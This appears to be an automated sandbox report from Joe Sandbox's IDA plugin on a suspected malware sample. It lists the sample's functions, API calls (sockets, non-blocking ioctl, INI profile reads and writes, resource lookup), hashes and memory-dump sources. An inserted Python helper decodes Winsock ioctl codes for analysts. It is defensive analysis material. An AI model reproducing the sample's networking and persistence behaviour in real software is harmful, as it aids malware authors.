                                                                                  • API String ID: 3936482309-0
                                                                                  • Opcode ID: 4df94f01e9097f76775214a2133e64fe943ad29cae760b09641aaa238c9e330e
                                                                                  • Instruction ID: b94647dcf1c3cb02d1d7989e41e59dd63cc95e1da4bb0be2e91c54ba973cf444
                                                                                  • Opcode Fuzzy Hash: 4df94f01e9097f76775214a2133e64fe943ad29cae760b09641aaa238c9e330e
                                                                                  • Instruction Fuzzy Hash: AA62C234A00219CFDB68DF54C890BDDB7B2BB58308F24929AD4596B395CB74AEC6CF44
                                                                                  APIs
                                                                                  • __EH_prolog3.LIBCMT ref: 0045078B
                                                                                    • Part of subcall function 004575CB: _memset.LIBCMT ref: 004575DD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3_memset
                                                                                  • String ID: ank
                                                                                  • API String ID: 2828583354-2538243836
                                                                                  • Opcode ID: 367366c12be5fce0cde8e24113283c0714d6b3640caf9c0fd48634587c853577
                                                                                  • Instruction ID: 390b0fbe61fcfa768a89a4363a0b4a659a93c37f7ec9aba5daa5290a84828d0b
                                                                                  • Opcode Fuzzy Hash: 367366c12be5fce0cde8e24113283c0714d6b3640caf9c0fd48634587c853577
                                                                                  • Instruction Fuzzy Hash: 2A316C7180024EAADF11EFE1DC45EEEBF78EF54304F10402AF905A7152EA789A49DBA5
                                                                                  APIs
                                                                                    • Part of subcall function 00433150: _memset.LIBCMT ref: 004331B0
                                                                                    • Part of subcall function 00433150: _rand.LIBCMT ref: 00433200
                                                                                    • Part of subcall function 00433150: _strlen.LIBCMT ref: 004338E3
                                                                                  • _strlen.LIBCMT ref: 00409740
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strlen$_memset_rand
                                                                                  • String ID: data.txt
                                                                                  • API String ID: 1938946822-2335734025
                                                                                  • Opcode ID: a74a4b147fbb68d91680602c60ec8963fc3022eda1cd022aff5d8c0020813356
                                                                                  • Instruction ID: 9aad00d02f828d9cf4d6aa3d614c259e7ac78d4ab76df89f23a3c8e0015c2c05
                                                                                  • Opcode Fuzzy Hash: a74a4b147fbb68d91680602c60ec8963fc3022eda1cd022aff5d8c0020813356
                                                                                  • Instruction Fuzzy Hash: 7D2174B1D04248DEEB00DFA5DC057EE7BF45B09308F14406DD5057B282D7BE6648CBA9
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3
                                                                                  • String ID: PQJ
                                                                                  • API String ID: 431132790-2790535993
                                                                                  • Opcode ID: 83f3a5ca81fca0acbf06fcfd260204c7da74b8ce0988781578e33917163ac686
                                                                                  • Instruction ID: 1ee6ec5981f029bd2a2bd2fc1b0ebffaa0ba43b42ed90405a8c48d3c50c0e257
                                                                                  • Opcode Fuzzy Hash: 83f3a5ca81fca0acbf06fcfd260204c7da74b8ce0988781578e33917163ac686
                                                                                  • Instruction Fuzzy Hash: 1E018471504248AAEF14EF599805BAD7BA4EF04324F10C12FFA28D6281D7BC8A009B9D
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: __fclose_nolock
                                                                                  • String ID: *8C
                                                                                  • API String ID: 4232755567-852604661
                                                                                  • Opcode ID: 9a6b4c9852ff29c33f11b76970ab2ae6d741044081e15f4e0ce0ea66c17ab77d
                                                                                  • Instruction ID: 0a8ac03627f501b6d80e9e70dc24df4f6d00319177a7f2100748817241602a3a
                                                                                  • Opcode Fuzzy Hash: 9a6b4c9852ff29c33f11b76970ab2ae6d741044081e15f4e0ce0ea66c17ab77d
                                                                                  • Instruction Fuzzy Hash: BEF0C870C0060095C720AB6E8801A5E7AA0DF42334F10C26FE479D61D1EF3C47825B8F
                                                                                  APIs
                                                                                  • FindResourceA.KERNEL32(0000E000,?,00000006), ref: 6A6E4457
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FindResource
                                                                                  • String ID: NHoj
                                                                                  • API String ID: 1635176832-1795478340
                                                                                  • Opcode ID: bd97a3092ae6dac5f10e1ffdd6ace37e1e61726f339108b0cde6b608c62c30cb
                                                                                  • Instruction ID: be757edf717517e3dfd6ca98f1c077798d3874730fbd7b48dac425738ea8e75f
                                                                                  • Opcode Fuzzy Hash: bd97a3092ae6dac5f10e1ffdd6ace37e1e61726f339108b0cde6b608c62c30cb
                                                                                  • Instruction Fuzzy Hash: 5BD02B263181207AE500051FBC48DBB73FCDFC1A35F09802AF885D6140D6B4AC53A5B1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0b10c5da79b61c569c79d1e34ecf045a862689e6fdb87559b0278fbe4c6a84b6
                                                                                  • Instruction ID: b4b7a06123ece10e633aa6e29246d5e16198db7511657887826e787ce01a2d3c
                                                                                  • Opcode Fuzzy Hash: 0b10c5da79b61c569c79d1e34ecf045a862689e6fdb87559b0278fbe4c6a84b6
                                                                                  • Instruction Fuzzy Hash: 35C1C4B4A00209EFEB04DF98C584BAEB7B1FF48304F24819AE8156B391D735AE85DF45
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0e81d37a345bc1f8f0cc6f9863444428a4d4c69417af1cc8b8c7a3cb07f3c4f3
                                                                                  • Instruction ID: 27c24f1cd0f0e751fa3959e0984b855749b06dccd518ae45e466147fba2e2d61
                                                                                  • Opcode Fuzzy Hash: 0e81d37a345bc1f8f0cc6f9863444428a4d4c69417af1cc8b8c7a3cb07f3c4f3
                                                                                  • Instruction Fuzzy Hash: 5441AD70900246DFDF38DF7AF08475A3BF1AB89318F156159E8598B380E770CA9ACB55
                                                                                  APIs
                                                                                  • SendMessageA.USER32(?), ref: 0042EEC8
                                                                                  • SendMessageA.USER32(?,000083F4,?,?), ref: 0042EEFF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: 4fa584b0a2ed7970015e4984acbaa877dcc50fb3bdc3585c0af49128e01a110c
                                                                                  • Instruction ID: 75d7f013a3e4a15d4e083539d0650aa2a8554d84433bfb35e4e7c3e210ea4f17
                                                                                  • Opcode Fuzzy Hash: 4fa584b0a2ed7970015e4984acbaa877dcc50fb3bdc3585c0af49128e01a110c
                                                                                  • Instruction Fuzzy Hash: 7E410B74A00249EFCB04DF95D584AAEBBB5FF48310F618299E8199B351C734EE42CFA4
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0044B047
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,00409C74,Function_00008B20,00000000), ref: 0044B0E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle_memset
                                                                                  • String ID:
                                                                                  • API String ID: 900656945-0
                                                                                  • Opcode ID: f496cc6c020ad3bde3618cc50923a222c8bd5a73da298168fc8f1a9695ff664c
                                                                                  • Instruction ID: 0be551aa10e4cf54a87f88e6155b20563739340b2a32a959c6581a3fbf4ffaec
                                                                                  • Opcode Fuzzy Hash: f496cc6c020ad3bde3618cc50923a222c8bd5a73da298168fc8f1a9695ff664c
                                                                                  • Instruction Fuzzy Hash: B731ACB2C00209BFDF11BFA58C81DAFBBB8EF48354F10856AF610B2251D73899429F94
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove_s
                                                                                  • String ID:
                                                                                  • API String ID: 800865076-0
                                                                                  • Opcode ID: ceef347175e8db6de08bab33336f9eb44bbc1801ab1258b589a60e9bf10a3238
                                                                                  • Instruction ID: 06c13b7bb894df7a66d7d15d3376037dda0370fb72c973310e3a761aba051568
                                                                                  • Opcode Fuzzy Hash: ceef347175e8db6de08bab33336f9eb44bbc1801ab1258b589a60e9bf10a3238
                                                                                  • Instruction Fuzzy Hash: FD418279E00108EFCB08DF99D49499DF7B2EF89314F10C15AE915AB364DB35A941CF54
                                                                                  APIs
                                                                                  • SendMessageA.USER32(00000000,00000030,004A8C94,00000000), ref: 00425876
                                                                                  • SendMessageA.USER32(00000000,000001A0,000000FF,?), ref: 004258A2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: bc335449d85492de55deab32beb8eab24af2b27b043a2e3ff59a4220d6774b36
                                                                                  • Instruction ID: 6c926e64ed21cbf0bf1ea527843c4211a97e374d6657de467ba760ed327cdcc6
                                                                                  • Opcode Fuzzy Hash: bc335449d85492de55deab32beb8eab24af2b27b043a2e3ff59a4220d6774b36
                                                                                  • Instruction Fuzzy Hash: 1731D971A00208EFEB04DF94D955BAEB7B5EB48300F2082A9E915AB280D6749E11DB98
                                                                                  APIs
                                                                                  • _strlen.LIBCMT ref: 0042A373
                                                                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0042A3E6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend_strlen
                                                                                  • String ID:
                                                                                  • API String ID: 3939138701-0
                                                                                  • Opcode ID: d26ba3268de8652e7f6b4a0adade547fcf2bf92870012938307f26f41c2d0c73
                                                                                  • Instruction ID: 06827b4b7a0950c66db9dc926f0246985dfb2cc0dcac069d4a554fcb11e4bb9f
                                                                                  • Opcode Fuzzy Hash: d26ba3268de8652e7f6b4a0adade547fcf2bf92870012938307f26f41c2d0c73
                                                                                  • Instruction Fuzzy Hash: FD312DB0A00248DBCB04DF94D991BAFBBB5AF48304F20811EAD06AB345D7389A55CB99
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                   • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset_strncpy
                                                                                  • String ID:
                                                                                  • API String ID: 3140232205-0
                                                                                  • Opcode ID: 2f245ab8778eda46ee2d51aecb5f2b06c7af3602b7ca935219b03933d189649a
                                                                                  • Instruction ID: b122bf973f758116ea1e65ed59e61da23d2d367533e9fe73fcca4dd926c6f3cb
                                                                                  • Opcode Fuzzy Hash: 2f245ab8778eda46ee2d51aecb5f2b06c7af3602b7ca935219b03933d189649a
                                                                                  • Instruction Fuzzy Hash: FA21D2716083049FD314CF59D8959EBB7E9FBD9308F41492DE188C3241EE75AA498BE2
                                                                                  APIs
                                                                                  • _strlen.LIBCMT ref: 00424354
                                                                                  • SendMessageA.USER32(?,00000030,004A8C94,00000000), ref: 004243B2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend_strlen
                                                                                  • String ID:
                                                                                  • API String ID: 3939138701-0
                                                                                  • Opcode ID: 80da9279a3a0bde48a42c59257073623c6c6db6d5a60c7e76e01edd3bca5d4fc
                                                                                  • Instruction ID: fb5fb24ae44d4a52bfc51c8ddee00626155474bc6a937a0f95f6afaa08723881
                                                                                  • Opcode Fuzzy Hash: 80da9279a3a0bde48a42c59257073623c6c6db6d5a60c7e76e01edd3bca5d4fc
                                                                                  • Instruction Fuzzy Hash: 14210CB1A00218DFDB04DF95D891BAE77B5FF88304F10821AF909AB341D774D910CB95
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0042550E
                                                                                    • Part of subcall function 00420690: _memset.LIBCMT ref: 004206B5
                                                                                  • SendMessageA.USER32(?,00000030,004A8C94,00000000), ref: 00425597
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 2497471678-0
                                                                                  • Opcode ID: a05c6f9311e8f4713f13ad1699b594822c734aa248559991c2f36b9c19a4dac8
                                                                                  • Instruction ID: f9e6eea926a12ec3bd772ddd132449135aa46cbb1fa14d62a86f1ba887566e2e
                                                                                  • Opcode Fuzzy Hash: a05c6f9311e8f4713f13ad1699b594822c734aa248559991c2f36b9c19a4dac8
                                                                                  • Instruction Fuzzy Hash: 20219371A0021CABD718DF54DC43FEA7378AB48700F40419DB7099B281DAB4AE80CFA5
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00404D42
                                                                                  • GetPrivateProfileStringA.KERNEL32(?,?,00486D9D,?,00000400,?), ref: 00404D79
                                                                                    • Part of subcall function 00405EA0: _strlen.LIBCMT ref: 00405EB3
                                                                                    • Part of subcall function 00406360: __mbsinc.LIBCMT ref: 0040638E
                                                                                    • Part of subcall function 00406360: _memmove_s.LIBCMT ref: 00406450
                                                                                    • Part of subcall function 004062D0: __mbsinc.LIBCMT ref: 00406324
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: __mbsinc$PrivateProfileString_memmove_s_memset_strlen
                                                                                  • String ID:
                                                                                  • API String ID: 2645958744-0
                                                                                  • Opcode ID: 2cacdfa7e0c7f78f62c9b683b61e5f620819ac63444be32352c6f19a40fc337d
                                                                                  • Instruction ID: c144573c4ba01f06b049e1f8e79028ca557a145e8ff996cdf194c253c0205f49
                                                                                  • Opcode Fuzzy Hash: 2cacdfa7e0c7f78f62c9b683b61e5f620819ac63444be32352c6f19a40fc337d
                                                                                  • Instruction Fuzzy Hash: FE210E70A00208ABCB04EFA5DC92EEEBB74AF44304F50456DF615772D2DF786A55CB98
                                                                                  APIs
                                                                                  • socket.WS2_32(?,00000002,00000001,00000000), ref: 00433CA2
                                                                                  • ioctlsocket.WS2_32(?,00000000,8004667E,00000001,?,00000002,00000001,00000000), ref: 00433CDE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ioctlsocketsocket
                                                                                  • String ID:
                                                                                  • API String ID: 416004797-0
                                                                                  • Opcode ID: 2238cc13a2a97a4dd49cdd68b5cae328d8ad7cc1a14feb0476f56a1283ddc202
                                                                                  • Instruction ID: c3fa6a9c5008dc6e90b83981714f416302fa7969edf922430d15e5f29beaebeb
                                                                                  • Opcode Fuzzy Hash: 2238cc13a2a97a4dd49cdd68b5cae328d8ad7cc1a14feb0476f56a1283ddc202
                                                                                  • Instruction Fuzzy Hash: 0611D030A04319ABDF54DF21C989BBAB3B8FF49305F5040DEE805AB251D77A9E86CB54
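The ioctlsocket call in the block above carries the raw command word 8004667E among the listed stack values. As an added example (not code from the report, from Joe Sandbox or from the sample), the Python below decodes Winsock ioctl command words using the BSD _IO/_IOR/_IOW bit layout that winsock2.h uses, names the three classic codes (FIONBIO, FIONREAD, SIOCATMARK; assumption: the call uses one of these), and scans a report line for a known code, since the listing is a stack dump and the command is not guaranteed to sit at a fixed argument position.

```python
import re

# Added example, not code from the report or the sample. winsock2.h encodes
# ioctlsocket() commands with the BSD macros: direction bits in the top byte,
# argument size in bits 16..22, a group letter in bits 8..15, a number in bits 0..7.
IOCPARM_MASK = 0x7F
IOC_VOID = 0x20000000
IOC_OUT = 0x40000000
IOC_IN = 0x80000000


def _ioc(direction, group, num, size):
    """Rebuild a command word the way _IOR/_IOW do (size is sizeof(u_long) == 4)."""
    return direction | ((size & IOCPARM_MASK) << 16) | (ord(group) << 8) | num


# Assumption: only the three classic Winsock codes are named here.
KNOWN = {
    _ioc(IOC_IN, "f", 126, 4): "FIONBIO",    # 0x8004667E: *argp != 0 enables non-blocking I/O
    _ioc(IOC_OUT, "f", 127, 4): "FIONREAD",  # 0x4004667F: bytes available to read
    _ioc(IOC_OUT, "s", 7, 4): "SIOCATMARK",  # 0x40047307: at the OOB mark?
}
MEANING = {
    "FIONBIO": "set non-blocking mode when *argp != 0",
    "FIONREAD": "query bytes available to read",
    "SIOCATMARK": "query whether the read pointer is at the OOB mark",
}


def decode_ioctl(code):
    """Return the fields encoded in a Winsock ioctl command word."""
    if code & IOC_IN and code & IOC_OUT:
        direction = "inout"
    elif code & IOC_IN:
        direction = "in"
    elif code & IOC_OUT:
        direction = "out"
    elif code & IOC_VOID:
        direction = "void"
    else:
        direction = "unknown"
    return {
        "code": code,
        "name": KNOWN.get(code),
        "direction": direction,
        "size": (code >> 16) & IOCPARM_MASK,
        "group": chr((code >> 8) & 0xFF),
        "number": code & 0xFF,
    }


def explain_report_call(line):
    """Find a known ioctl command among the hex values of a report 'ioctlsocket.WS2_32(...)'
    line and describe it. The slot after the command is returned as 'next_slot' only as a
    hint: the listing shows raw stack words, so it may be the argp pointer, not *argp."""
    m = re.search(r"ioctlsocket\.WS2_32\(([^)]*)\)", line)
    if not m:
        return None
    toks = m.group(1).split(",")
    for i, tok in enumerate(toks):
        try:
            value = int(tok, 16)
        except ValueError:
            continue  # '?' and other non-hex placeholders
        if value in KNOWN:
            info = decode_ioctl(value)
            info["meaning"] = MEANING[info["name"]]
            info["next_slot"] = toks[i + 1] if i + 1 < len(toks) else None
            return info
    return None


if __name__ == "__main__":
    # Report line copied from this listing.
    print(explain_report_call(
        "• ioctlsocket.WS2_32(?,00000000,8004667E,00000001,?,00000002,00000001,00000000), ref: 00433CDE"))
```

Pairing socket() with FIONBIO is the usual prelude to a connect() driven by select() or a timeout loop, which is worth knowing when tracing the non-standard-port traffic the report flags elsewhere.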
                                                                                  APIs
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,004367BD,?,00478E7C,004367BD,0049F098,00000010,0046BC06,00000000,004367BD,004367BD,004367BD,00000000,*8C), ref: 00478D99
                                                                                  • __dosmaperr.LIBCMT ref: 00478DD2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle__dosmaperr
                                                                                  • String ID:
                                                                                  • API String ID: 1450245014-0
                                                                                  • Opcode ID: 0f25b3828fc6950bcf3a590c979c69daebfade1f22a97c5f2ff18c88edc7616d
                                                                                  • Instruction ID: 12829da9ceb53137e8d8f01e46157a94e31bbc4ee5a0f984d90109dff1ce9c8e
                                                                                  • Opcode Fuzzy Hash: 0f25b3828fc6950bcf3a590c979c69daebfade1f22a97c5f2ff18c88edc7616d
                                                                                  • Instruction Fuzzy Hash: 3A01043254222459C63526395C8DBEB26488BD2728F35812FF91CDB3D2DF6DDC42429E
                                                                                  APIs
                                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0BEEC4E3
                                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0BEEC510
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                   • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
